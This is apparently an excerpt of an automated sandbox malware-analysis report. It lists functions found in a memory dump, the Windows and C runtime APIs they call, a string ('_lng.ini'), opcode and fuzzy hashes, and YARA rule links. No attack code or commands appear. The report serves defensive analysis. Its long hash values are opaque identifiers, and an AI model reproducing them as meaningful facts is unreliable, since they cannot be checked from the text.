                                                                                                    • Opcode ID: 74559878113e98b7c92c6c2e26052809371b4b2fa6834ba4a5e3c975617b6c8e
                                                                                                    • Instruction ID: 6b67abe0cf901482b9f604113e8dda1a3485a1b157cadbb33138d0b04dfd8998
                                                                                                    • Opcode Fuzzy Hash: 74559878113e98b7c92c6c2e26052809371b4b2fa6834ba4a5e3c975617b6c8e
                                                                                                    • Instruction Fuzzy Hash: 6B01AD75800204ABDB209F6ACC81AAFB7F9FF84745F10802AFC65B6281E3349845CB79
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B27C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407845: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040B282,00000000,0040B135,?,00000000,00000208,?), ref: 00407850
                                                                                                    • wcsrchr.MSVCRT ref: 0040B285
                                                                                                    • wcscat.MSVCRT ref: 0040B29B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                    • String ID: _lng.ini
                                                                                                    • API String ID: 383090722-1948609170
                                                                                                    • Opcode ID: ebfab51b43e3bdeb3de1b75ccf252cf509ebd259b02cc990bc39517140cf8681
                                                                                                    • Instruction ID: e50355d97bfc5f4f59e0c417dc43cfc1ee179ac760e4167406d25669e5e40421
                                                                                                    • Opcode Fuzzy Hash: ebfab51b43e3bdeb3de1b75ccf252cf509ebd259b02cc990bc39517140cf8681
                                                                                                    • Instruction Fuzzy Hash: 3FC01292945A1156F51633225D0BB8F02484F12305F70006FF800291C2BFEC551580AE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408185, Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 00408197
                                                                                                      • Part of subcall function 00407740: malloc.MSVCRT ref: 0040775C
                                                                                                      • Part of subcall function 00407740: memcpy.MSVCRT ref: 00407774
                                                                                                      • Part of subcall function 00407740: free.MSVCRT(00000000,00000000,?,004082CC,00000002,?,00000000,?,004085FF,00000000,?,00000000), ref: 0040777D
                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,00408650,?,000000FF), ref: 004081BD
                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,00408650,?,000000FF), ref: 004081E0
                                                                                                    • memcpy.MSVCRT ref: 00408204
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 726966127-0
                                                                                                    • Opcode ID: 95a6cfffc0988a5724a7c5d34a95fb6b87d7d6e9d53c2dde1d9a9b25cad48689
                                                                                                    • Instruction ID: e94601d50a6b0fbc57d61eab93eb5dabf4d915648c00774677957bdecdc64841
                                                                                                    • Opcode Fuzzy Hash: 95a6cfffc0988a5724a7c5d34a95fb6b87d7d6e9d53c2dde1d9a9b25cad48689
                                                                                                    • Instruction Fuzzy Hash: CB214C71100604EFD720DF19D98189AB7F5FF443247208A2EF8A6AB6D1CB75B916CB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B40B, Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1860491036-0
                                                                                                    • Opcode ID: 9d5645f8e21aa17d5f96908486e6c805c1b59531ad71ac17450213c706f267d6
                                                                                                    • Instruction ID: 36e7432711815c8fa5cb0178d2b89643d9533de9918535d372db07a2428353fe
                                                                                                    • Opcode Fuzzy Hash: 9d5645f8e21aa17d5f96908486e6c805c1b59531ad71ac17450213c706f267d6
                                                                                                    • Instruction Fuzzy Hash: CA21C2B0A01700CED7218F2A8444A12FBE8FF90310B25C9AFD159CB2B2D3B8C940DF59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A652, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1033339047-0
                                                                                                    • Opcode ID: 5244d8cba1639fe20cbeef0d58b84f3c4e94318687fa0966f0e5c4f8e526ef6f
                                                                                                    • Instruction ID: 25b805e9318d4ba3dfb86811f674215f81fe5e4a1a14aa662eed25583708699e
                                                                                                    • Opcode Fuzzy Hash: 5244d8cba1639fe20cbeef0d58b84f3c4e94318687fa0966f0e5c4f8e526ef6f
                                                                                                    • Instruction Fuzzy Hash: 86011EB22423005EE7589B38EF17B2A76A09759351F50813FF106CD2F6EAF49441DA08
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%